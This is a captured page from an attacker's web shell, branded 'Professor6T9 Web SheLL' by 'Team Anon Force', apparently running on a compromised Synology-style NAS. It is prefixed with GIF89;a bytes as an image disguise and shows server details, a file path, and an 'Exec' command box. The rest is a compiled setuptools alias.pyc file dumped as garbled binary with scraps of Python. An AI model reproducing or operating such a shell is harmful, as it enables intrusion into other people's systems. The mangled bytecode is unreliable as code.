GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux SamCT211 4.4.302+ #86009 SMP Wed Nov 26 18:19:20 CST 2025 x86_64
nginx/1.23.1
192.168.4.211
/
volume1
/
@appstore
/
Contacts
/
radicale
/
site-packages
/
setuptools
/
command
/
__pycache__
[ HOME ]
Exec
Submit
alias.cpython-38.pyc
U �}�hO � @ sD d dl mZ d dlmZmZmZ dd� ZG dd� de�Zdd� Zd S ) � )�DistutilsOptionError)�edit_config�option_base�config_filec C s8 dD ]}|| krt | � S q| �� | gkr4t | �S | S )z4Quote an argument for later parsing by shlex.split())�"�'�\�#)�repr�split)�arg�c� r �?/tmp/pip-target-k_nuic9h/lib/python/setuptools/command/alias.py�shquote s r c @ sH e Zd ZdZdZdZdgej Zejdg Zdd� Z dd � Z d d� ZdS ) �aliasz3Define a shortcut that invokes one or more commandsz0define a shortcut to invoke one or more commandsT)�remove�rzremove (unset) the aliasr c C s t �| � d | _d | _d S )N)r �initialize_options�argsr ��selfr r r r s zalias.initialize_optionsc C s* t �| � | jr&t| j�dkr&td��d S )N� zFMust specify exactly one argument (the alias name) when using --remove)r �finalize_optionsr �lenr r r r r r r ! s �zalias.finalize_optionsc C s� | j �d�}| js@td� td� |D ]}tdt||�� q&d S t| j�dkr�| j\}| jrbd }q�||kr~tdt||�� d S td| � d S n$| jd }d�tt | jdd � ��}t | jd||ii| j� d S ) N�aliaseszCommand Aliasesz---------------zsetup.py aliasr z No alias definition found for %rr � ) �distribution�get_option_dictr �print�format_aliasr r �join�mapr r �filename�dry_run)r r r �commandr r r �run) s&